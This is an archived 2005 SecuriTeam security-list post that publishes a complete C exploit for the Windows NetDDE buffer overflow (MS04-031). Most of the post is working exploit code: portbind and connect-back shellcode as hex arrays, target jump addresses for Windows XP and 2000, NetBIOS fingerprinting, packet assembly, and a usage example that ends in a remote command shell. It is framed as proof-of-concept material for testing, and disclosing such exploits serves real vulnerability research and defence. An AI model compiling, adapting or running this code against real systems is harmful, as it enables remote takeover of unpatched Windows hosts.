[EXPL] NetDDE MS04-031 Exploit Code
From: SecuriTeam (support_at_securiteam.com)
Date: 01/02/05
- Previous message: SecuriTeam: "[EXPL] WINS MS04-045 Exploit Code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 2 Jan 2005 11:58:48 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
NetDDE MS04-031 Exploit Code
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article:
<http://www.securiteam.com/windowsntfocus/6W00G0UBFM.html> Vulnerability
in NetDDE Could Allow Remote Code Execution (MS04-031), a vulnerability in
NetDDE allows a remote attacker to cause the NetDDE service to execute
arbitrary code. The following exploit code can be used to test your system
for the mentioned vulnerability.
DETAILS
Exploit:
/* HOD-ms04031-netdde-expl.c: 2004-12-30: PUBLIC v.0.2
*
* Copyright (c) 2004 houseofdabus.
*
* (MS04-031) NetDDE buffer overflow vulnerability PoC
*
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* (special unstable version)
* ---------------------------------------------------------------------
* Description:
* A remote code execution vulnerability exists in the NetDDE
* services because of an unchecked buffer. An attacker who
* successfully exploited this vulnerability could take complete
* control of an affected system. However, the NetDDE services are
* not started by default and would have to be manually started for
* an attacker to attempt to remotely exploit this vulnerability.
* This vulnerability could also be used to attempt to perform
* a local elevation of privilege or remote denial of service.
*
* ---------------------------------------------------------------------
* Patch:
* http://www.microsoft.com/technet/security/Bulletin/MS04-031.mspx
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows XP Professional SP0
* - Windows XP Professional SP1
* - Windows 2000 Professional SP2
* - Windows 2000 Professional SP3
* - Windows 2000 Professional SP4
* - Windows 2000 Advanced Server SP4
*
* ---------------------------------------------------------------------
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so. - SECU
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms04031-expl HOD-ms04031-expl.c
* Win32/cygwin: gcc -o HOD-ms04031-expl HOD-ms04031-expl.c -lws2_32.lib
* Linux : gcc -o HOD-ms04031-expl HOD-ms04031-expl.c -Wall
*
* ---------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
* HOD-ms04031-expl.exe <host> <netbios name> <target> <bindport>
* [connectback IP] [options]
*
* Targets:
* 0 [0x00abfafc]: WinXP [universal]
* 1 [0x009efb40]: Win2K [universal]
*
* Options:
* -f: Netbios name fingerprinting
*
* ---------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms04031-expl.exe 192.168.0.1 -f
* [*] Connecting to 192.168.0.1:139 ... OK
* [*] Fingerprinting... OK
* [+] Remote netbios name: HOD
*
* C:\>
* C:\>HOD-ms04031-expl.exe 192.168.0.1 HOD 1 7878
* [*] Connecting to 192.168.0.1:139 ... OK
* [*] Attacking 192.168.0.1 ...OK.
*
* C:\>nc 192.168.0.1 7878
*
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
*
* ---------------------------------------------------------------------
*/
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif
/* targets table */
struct targets {
int num;
char name[50];
long jmpaddr;
}
target[]= {
{ 0, "WinXP [universal] ", 0x00abfb1c - 0x20 },
{ 1, "Win2K [universal] ", 0x009efb60 - 0x20 }
};
/* portbind shellcode */
unsigned char portbindsc[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
"\x28\xff\x55\x0c";
/* connectback shellcode */
unsigned char connectbacksc[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa"
"\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02"
"\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83"
"\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83"
"\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc"
"\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8"
"\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90"
"\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50"
"\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8"
"\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56"
"\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa"
"\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab"
"\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50"
"\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff"
"\x77\x38\xff\x55\x20\xff\x55\x0c";
#define SET_PORTBIND_PORT(buf, port) *(unsigned
short *)(((buf)+300)) = (port)
#define SET_CONNECTBACK_IP(buf, ip) *(unsigned
long *)(((buf)+283)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port)
*(unsigned short *)(((buf)+290)) = (port)
/*
eax = target[].jmpaddr -> stack -> jmpcode -> shellcode
1. 0100D605 call dword ptr [eax+20h]
2. jmpcode
3. shellcode
*/
char jmpcode[] =
"\x90\x90\x90\x90\x66\x81\xC7\x20\x03\xFF\xE7\x90\x90\x90\x90\x90"
"\x50\x6f\x43\x20\x66\x6f\x72\x20\x4e\x65\x74\x44\x44\x45\x20\x28"
"\x4d\x53\x30\x34\x2d\x30\x33\x31\x29\x2e\x20\x43\x6f\x70\x79\x72"
"\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30\x30\x34\x2d\x32\x30"
"\x30\x35\x20\x68\x6f\x75\x73\x65\x6f\x66\x64\x61\x62\x75\x73\x2e"
"\xBB\xBB\xBB\xBB" /* => eax */
"PADPAD";
char smb_sesreq[] =
"\x81\x00\x00\x44\x20\x43\x4b\x46\x44\x45\x4e\x45\x43\x46\x44\x45"
"\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43\x41\x43\x41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x00\x20\x45\x4b\x45\x44\x46\x45\x45\x49\x45"
"\x44\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x41\x41\x00";
char smb_negotiate[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x02"
"\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e"
"\x31\x32\x00";
char d1[] =
"\x0d\x12\x0b\x06\x0d\x18\x1c\x01\x10\x03\x12\x08\x1d\x1f\x0a\x0a"
"\x16\x02\x17\x0e\x1b\x0d";
char req1[] =
"\x81\x00\x00\x44";
char req2[] =
"CACACACACACACACACACACACACACACABP";
char h1[] =
"\x45\x44\x44\x4E\x00\x00\x00";
char h2[] =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char h3[] =
"\x00\x00\x02\x02\x00\x00\x00\x01\x00\x00\x00";
unsigned long ndlen = 0;
unsigned long ntarget = 0;
unsigned long backip = 0;
unsigned short bindport = 0;
unsigned long
fixx(unsigned char *data, unsigned long i)
{
unsigned long len;
len = (data[i+3]<<24) +
(data[i+2]<<16) +
(data[i+1]<<8) +
(data[i]);
return len;
}
unsigned long
chksum(unsigned char *data, unsigned long dlen)
{
unsigned long i, len;
unsigned long chk;
chk = 0xFFFFFFFF;
len = dlen - 4;
for (i=0; i<len; i+=4)
chk += fixx(data, i);
while (i < dlen) {
chk += (unsigned char)data[i];
i++;
}
return chk;
}
char *
netbios_encode(char *ndata, char service)
{
char *tmpdata, *data, *nret;
unsigned long dlen;
char odiv, omod, o;
int i;
data = (char *)calloc(17, 1);
memcpy(data, ndata, strlen(ndata));
dlen = strlen(data);
while (dlen < 15) {
strcat(data, "\x20");
dlen++;
}
memcpy(data+strlen(data), &service, 1);
nret = (char *)calloc(strlen(data)*2+1, 1);
tmpdata = nret;
for (i=0; i<16; i++) {
o = (char)data[i];
odiv = o / 16;
odiv = odiv + 0x41;
omod = o % 16;
omod = omod + 0x41;
*tmpdata++ = odiv;
*tmpdata++ = omod;
}
free(data);
return nret;
}
unsigned char *
find_smbname(unsigned char *data, unsigned long len)
{
unsigned char *ptr;
unsigned long i = 0;
ptr = data;
ptr += 91;
while (i <= len - 3) {
if (ptr[i] == '\x00')
if (ptr[i+1] == '\x00')
if (ptr[i+2] == '\x00')
return ptr+i+3;
i++;
}
return NULL;
}
/* fingerprinting */
unsigned char *
smb_get_name(char *ip)
{
int sock, r;
unsigned long smbname_len;
unsigned char *name = NULL, *smbname;
struct sockaddr_in s;
struct hostent *he;
unsigned char buf[256];
if ((he = gethostbyname(ip)) == NULL) {
printf("[-] Unable to resolve %s\n", ip);
return NULL;
}
sock = socket(AF_INET, SOCK_STREAM,
IPPROTO_TCP);
if (sock < 0) return NULL;
s.sin_family = AF_INET;
s.sin_addr = *((struct in_addr *)he->h_addr);
s.sin_port = htons(139);
memset(&(s.sin_zero), '\0', 8);
memset(buf, 0, 256);
printf("[*] Connecting to %s:139 ... ", ip);
r = connect(sock, (struct sockaddr *) &s, sizeof(struct
sockaddr_in));
if (r == 0) {
printf("OK\n[*] Fingerprinting... ");
/* sending session request */
send(sock, smb_sesreq, sizeof(smb_sesreq)-1,
0);
Sleep(1000);
r = recv(sock, (char *)buf, 256, 0);
if (r < 0) goto err;
memset(buf, 0, 256);
/* sending negotiation request */
send(sock, smb_negotiate,
sizeof(smb_negotiate)-1, 0);
Sleep(1000);
r = recv(sock, (char *)buf, 256, 0);
if (r < 0) goto err;
printf("OK\n");
smbname = find_smbname(buf, r);
if (smbname == NULL) goto err;
smbname_len = smbname - buf;
name = (unsigned char *)calloc(smbname_len,
1);
/* decoding */
r = 0;
while (smbname_len) {
if (*smbname != '\x00') {
name[r] = *smbname;
r++;
}
smbname++;
smbname_len--;
}
} else {
printf("failed\n[-] Can't connect to %s:139\n", ip);
}
err:
shutdown(sock, 1);
closesocket(sock);
return name;
}
/* NetDDE packet */
char *
packet_assembly(char *name, char *host)
{
char *main, *header, *data;
char *lname, *rhost;
unsigned long llen, rlen, len, hlen, dlen, csum, i;
unsigned char name_hi, name_low, rhost_hi,
rhost_low;
unsigned char hod_hi, hod_low, len_hi, len_low;
unsigned char nops[] = "\x90\x90\x90\x90"; /* nops */
char hod[] = "HOD-HOD\x01";
char hmain[] = "\x01\x00\xBE\x05\x0A\x00\x00";
char tmp[8];
llen = strlen(name) + 4;
rlen = strlen(host);
lname = (char *)calloc(llen + 3, 1);
rhost = (char *)calloc(rlen + 3, 1);
memcpy(lname, name, llen);
strcpy(rhost, host);
memcpy(lname + llen, "\x01", 1);
strcat(rhost, "\x01");
name_hi = (unsigned char) ((llen+1) / 256);
name_low = (unsigned char) ((llen+1) % 256);
rhost_hi = (unsigned char) ((rlen + llen + 2) / 256);
rhost_low = (unsigned char) ((rlen + llen + 2) % 256);
len = sizeof(hod) - 1;
hod_hi = (unsigned char) (len / 256);
hod_low = (unsigned char) (len % 256);
main = (char *)calloc( sizeof(hod)-1 +
sizeof(hmain)-1 +
llen + rlen +
11, 1 );
memcpy(main, hmain, sizeof(hmain)-1);
sprintf(tmp, "%c%c%c%c%c%c", name_hi, name_low,
rhost_hi, rhost_low, hod_hi, hod_low);
memcpy(main+sizeof(hmain)-1, tmp, 6);
memcpy(main+sizeof(hmain)-1+6, "\x00", 1);
memcpy(main+sizeof(hmain)-1+7, lname, llen+1);
memcpy(main+sizeof(hmain)-1+7+llen+1, rhost,
rlen+1);
memcpy(main+sizeof(hmain)-1+7+llen+1+rlen+1, hod,
sizeof(hod)-1);
memcpy(main+sizeof(hmain)-1+7+llen+1+rlen+1+sizeof(hod)-1,
"\x2e", 1);
len =
sizeof(hmain)-1+7+llen+1+rlen+1+sizeof(hod)-1+1;
len_hi = (unsigned char) (len / 256);
len_low = (unsigned char) (len % 256);
/* header */
header = (char *)calloc(sizeof(h1)-1 +
sizeof(h2)-1 +
sizeof(h3)-1 +
9, 1);
memcpy(header, h1, sizeof(h1)-1);
sprintf(tmp, "%c%c", len_hi, len_low);
memcpy(header+sizeof(h1)-1, tmp, 2);
memcpy(header+sizeof(h1)-1+2, h2, sizeof(h2)-1);
memcpy(header+sizeof(h1)-1+2+sizeof(h2)-1, tmp, 2);
memcpy(header+sizeof(h1)-1+2+sizeof(h2)-1+2, h3,
sizeof(h3)-1);
csum = chksum(main, len);
memcpy(header+sizeof(h1)-1+sizeof(h2)-1+4
+ sizeof(h3)-1, &csum, 4);
/* data */
hlen = sizeof(h1)-1 + sizeof(h2)-1 + sizeof(h3)-1 + 8;
data = (char *)calloc( sizeof(d1)-1 +
len+hlen +
37 +
1200, 1 );
csum = chksum(header, hlen);
memcpy(data+4, &csum, 4);
memcpy(data+4+4, header, hlen);
memcpy(data+4+4+hlen, main, len);
memcpy(data+4+4+hlen+len, d1, sizeof(d1)-1);
/* nops */
for (i=0; i<154; i++)
memcpy(data+4+4+hlen+len+sizeof(d1)-1 + i*4,
nops, 4);
/* shellcode */
if (!backip) {
/* portbind */
SET_PORTBIND_PORT(portbindsc,
htons(bindport));
memcpy(data+4+4+hlen+len+sizeof(d1)-1+154*4,
portbindsc, sizeof(portbindsc)-1);
dlen =
4+hlen+len+sizeof(d1)-1+sizeof(portbindsc)-1+154*4;
} else {
/* connectback */
SET_CONNECTBACK_IP(connectbacksc,
backip);
SET_CONNECTBACK_PORT(connectbacksc,
htons(bindport));
memcpy(data+4+4+hlen+len+sizeof(d1)-1+154*4,
connectbacksc, sizeof(connectbacksc)-1);
dlen =
4+hlen+len+sizeof(d1)-1+sizeof(connectbacksc)-1+154*4;
}
ndlen = dlen + 4;
dlen = htonl(dlen);
memcpy(data, &dlen, 4);
free(lname);
free(rhost);
free(main);
free(header);
return data;
}
void
usage(char *prog)
{
int i;
printf("%s <host> <netbios name> <target> <bindport>
[connectback IP] [options]\n\n", prog);
printf("Targets:\n");
for (i = 0; i < 2; i++)
printf(" %d [0x%.8x]: %s\n", target[i].num,
target[i].jmpaddr, target[i].name);
printf("\nOptions:\n\t-f: Netbios name fingerprinting\n");
exit(0);
}
void
vargs(int argc, char **argv)
{
int i, finger = 0;
char *nname = NULL;
for (i = 2; i < argc; i++) {
if (argv[i][0] == '-') {
if (argv[i][1] == 'f')
finger = 1;
}
}
if (finger && argc > 2) {
nname = smb_get_name(argv[1]);
if (nname) {
printf("[+] Remote netbios name: %s\n",
nname);
free(nname);
}
exit(0);
} else
if (argc < 5) usage(argv[0]);
if ((ntarget = atoi(argv[3])) > 1) usage(argv[0]);
bindport = (unsigned short)atoi(argv[4]);
if (argc > 5) backip = inet_addr(argv[5]);
return;
}
int
main (int argc, char **argv)
{
int len, sockfd;
char *host;
char *req;
struct hostent *he;
struct sockaddr_in their_addr;
char rbuf[4096];
#ifdef _WIN32
WSADATA wsa;
#endif
char *ses_req;
char *data, *hname;
char *hn, *hn2;
unsigned long req_sz, hname_len, hn_len;
#ifdef _WIN32
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
printf("\n (MS04-031) NetDDE buffer overflow
vulnerability PoC\n\n");
printf("\tCopyright (c) 2004-2005 .::[ houseofdabus
]::.\n\n\n");
vargs(argc, argv);
hn = argv[2]; /* target netbios name */
host = argv[1]; /* target host name */
if (strlen(host) > 1024) return 0;
/* target jmpaddr */
memcpy(jmpcode+80, &target[ntarget].jmpaddr, 4);
ses_req = (char *)calloc(sizeof(req1)-1 +
sizeof(req2)-1 +
114, 1);
memcpy(ses_req, req1, sizeof(req1)-1);
memcpy(ses_req+sizeof(req1)-1, "\x20", 1);
hname = netbios_encode(hn, 0x1F);
hname_len = strlen(hname);
memcpy(ses_req+sizeof(req1)-1+1, hname,
hname_len);
memcpy(ses_req+sizeof(req1)-1+1+hname_len,
"\x00\x20", 2);
memcpy(ses_req+sizeof(req1)-1+1+hname_len+2,
req2, sizeof(req2)-1);
memcpy(ses_req+sizeof(req1)-1+1+hname_len+2+sizeof(req2)-1,
"\x00", 1);
req_sz =
sizeof(req1)-1+sizeof(req2)-1+hname_len+4;
if ((he = gethostbyname(host)) == NULL) {
printf("[-] Unable to resolve %s\n", host);
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) <
0) {
printf("[-] Error: socket failed\n");
return 0;
}
req = req1;
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(139);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
/* connecting */
printf("[*] Connecting to %s:139 ... ", host);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) < 0) {
printf("[-] Error: connect failed\n");
return 0;
}
printf("OK\n");
if (send(sockfd, ses_req, req_sz, 0) < 0) {
printf("[-] Error: send failed\n");
return 0;
}
len = recv(sockfd, rbuf, 4096, 0);
if (len < 0) return 0;
/* check NetDDE */
if ((unsigned char)rbuf[0] != 0x82) {
printf("[-] NetDDE disabled or wrong netbios
name\n");
return 0;
}
hn2 = (char *)calloc(16, 1);
memcpy(hn2, hn, strlen(hn));
hn_len = strlen(hn);
while (hn_len < 15) {
strcat(hn2, "\x20");
hn_len++;
}
/* attacking */
printf("[*] Attacking %s ...", host);
data = packet_assembly(jmpcode, hn2);
if (send(sockfd, data, ndlen, 0) < 0) {
printf("\n[-] Error: send failed\n");
return 0;
}
printf("OK.\n");
len = recv(sockfd, rbuf, 4096, 0);
shutdown(sockfd, 1);
closesocket(sockfd);
free(data);
free(hn2);
free(ses_req);
free(hname);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by houseofdabus.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] WINS MS04-045 Exploit Code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
